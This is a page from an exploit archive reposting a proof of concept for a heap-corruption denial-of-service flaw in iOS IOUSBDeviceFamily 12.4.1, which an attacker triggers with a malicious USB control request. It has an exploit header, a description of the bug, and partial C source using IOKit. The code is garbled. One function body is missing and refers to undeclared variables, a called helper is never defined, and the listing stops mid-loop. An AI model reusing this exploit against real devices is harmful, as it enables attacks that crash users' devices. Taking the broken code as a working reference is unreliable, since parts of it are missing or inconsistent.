Exploits / Vulnerability Discovered : 2019-11-11 |
Type : dos |
Platform : ios
This exploit / vulnerability Ios iousbdevicefamily 12.4.1 iointerrupteventsource heap corruption (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
# Date: 2019-10-29
# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
# Vendor Homepage: https://apple.com/
# Software Link: https://support.apple.com/en-hk/HT210606
# Version: iOS 13
# Tested on: iOS 12.4.1
# CVE : N/A
# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
# The code can be triggered by a local attacker by sending a malicious USB control request to device.
# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)
iousbusted.c
/*
Pure IOKit implementation of CVE-2019-8718
Written by Sem Voigtländer.
Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
Tip: You can also use this for projects like checkm8 autopwn etc.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <IOKit/usb/IOUSBLib.h>
#include <IOKit/IOCFPlugIn.h>
#include <CoreFoundation/CoreFoundation.h>
/* Faster comparissions for 64-bit integers than != and == */
#define FCOMP(P1,P2) !(P1 ^ P2)
const char *defaultMsg = "HELLO WORLD";
/* Method for sending an USB control message to a target device */
static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx, const char *msg)
{
// Now done with the plugin interface.
(*plugInInterface)->Release(plugInInterface);
//plugInInterface = NULL;
if(!dev)
return KERN_FAILURE;
return err;
}
/* Iterate over all USB devices */
static int iterate_usb_devices(const char *msg){
CFMutableDictionaryRef matchingDict;
io_iterator_t iter;
kern_return_t kr;
io_service_t device;
/* set up a matching dictionary for the class */
matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
if (matchingDict == NULL)
{
return -1; // fail
}
/* Now we have a dictionary, get an iterator.*/
kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
if (kr != KERN_SUCCESS)
{
return -1;
}
/* iterate */
while ((device = IOIteratorNext(iter)))
{
/* do something with device, eg. check properties */
kr = print_usb_device(device);
if(kr != KERN_SUCCESS){
printf("Skipping device as it has no vid / pid.\n");
continue;
}